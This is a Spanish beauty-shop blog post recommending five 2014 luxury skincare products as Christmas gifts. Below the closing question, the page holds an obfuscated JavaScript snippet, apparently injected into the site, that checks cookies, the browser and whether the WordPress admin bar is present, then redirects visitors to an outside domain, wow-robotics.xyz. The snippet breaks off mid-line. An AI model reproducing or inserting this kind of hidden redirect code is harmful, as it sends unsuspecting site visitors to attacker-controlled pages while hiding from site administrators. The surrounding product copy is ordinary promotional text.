miniserum

Porque cuidar nuestra piel es muy importante, desde Perfumerías Tin Tin queremos poneros al día con nuestro top de 5 productos que han revolucionado el mundo de la cosmética en 2014 y que pueden ser un excelente regalo para estas Navidades.

Las que nos cuidamos sabemos que regalar un producto de cosmética puede ser lo más práctico y útil, ya que a todos nos gusta vernos bien y sobretodo sentirnos bien.

Desde la casa Shiseido nos presentan el primer serum del mundo que inmuniza la piel: Ultimune está especialmente formulado para proteger al sistema inmunológico de la piel protegiéndola de las agresiones externas, estrés o el envejecimiento de la piel y que mejora las funciones de las células de Langerhans debilitadas por el paso del tiempo y las agresiones internas y externas.

https://www.youtube.com/watch?v=gjO2r94mh6M

Cuenta con la exclusiva tecnología Ultimune Complex que se encarga de reforzar la resistencia de la piel. Entre su composición encontramos un complejo botánico que contiene ginkgo biloba, perilla y tomillo salvaje. Su textura ligera permite una aplicación uniforme que se absorbe con facilidad en la piel dejándonos una sensación fresca y sedosa en el rostro.

En Yves Saint Laurent Beauty encontramos un contorno de ojos Or Rouge Eye Creme que hará las delicias de nuestras bolsas y ojeras, ayudándonos a conseguir una mirada descansada aportando frescor y tonificación en la zona.

Su nombre, como se puede intuir, significa “oro rojo“ y viene del ingrediente clave con el que está formulado el producto, el azafrán, cuyas flores se cosechan en las Montañas del Atlas de Marruecos.

Su fórmula enriquecida con OR ROUGE GFC™, ayuda a combatir los signos de la edad específicos del contorno de ojos. Esta refrescante, nutritiva y delicada emulsión con aceite de argán de Marruecos y ácido hialurónico ofrece un confort duradero y ayuda a reducir la hinchazón y las ojeras. La piel adquiere un nuevo brillo y las ojeras disminuyen, obteniendo una firmeza inmediata y duradera.

Un producto que nos permitirá disfrutar de un rostro impecable en tan sólo unos segundos es 10 Seconds Awakening Essence de Kanebo/Sensai. Se trata de un producto que actúa con rapidez proporcionando una piel fresca y radiante.

Una esencia hidratante en textura gel que proporciona a la piel un efecto recuperación inmediato, además de ayudarnos a protegernos del sol al incorporar filtro de protección UV. Entre sus funciones: incrementa la regeneración de la epidermis, piel sedosa, ideal como prebase para la base de maquillaje ya que ayuda a fijarla. Un uso continuado nos ayuda a mantener una piel resplandeciente y luminosa durante todo el día.

La Prairie presenta como novedad la gama Cellular Swiss Ice Crystal en la que nos presentan dos productos que nos ayudarán a que nuestra piel supere las agresiones externas que podamos padecer.

Por un lado la crema antiarrugas Cellular Swiss Ice Crystal Cream en la que La Prairie ha sido capaz incluir tres plantas (saxífraga púrpura, soldanella alpina y alga de nieve suiza) cultivadas en unos invernaderos a bajas temperaturas, y gracias a ellas extraer de las mismas todos los activos necesarios para restaurar de inmediato el aspecto de nuestra piel.

Estas tres plantas ayudan a renovar el aspecto de firmeza y suavidad ante la aparición de las arrugas, hidratando continuamente la piel desde una reserva de hidratación desde el interior.

Cellullar Swiss Ice Crystal Dry Oil es un aceite seco transparente que ayudará a apoyar la función de la barrera lipídica natural de la piel al estar formulado con aceites exclusivos y puros, por lo que sella la hidratación de nuestra piel durante más tiempo, mientras que sus suaves extractos botánicos la calman y la nutren, y la ayudan a incrementar su fuerza interior contra todos los factores de la vida diaria.

Su modo de uso es sencillo se debe aplicar el aceite sólo, y como es seco no es necesario calentarlo entre las manos, observaremos que penetra con facilidad sin dejar una sensación aceitosa en la piel. Os recomendamos como truco mezclar una gota de este aceite con nuestra crema hidratante habitual.

Estos dos productos combinados en conjuntamente harán las exquisiteces de nuestra piel.

¿Cuéntanos qué productos utilizas para estar preciosa la última noche del año?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone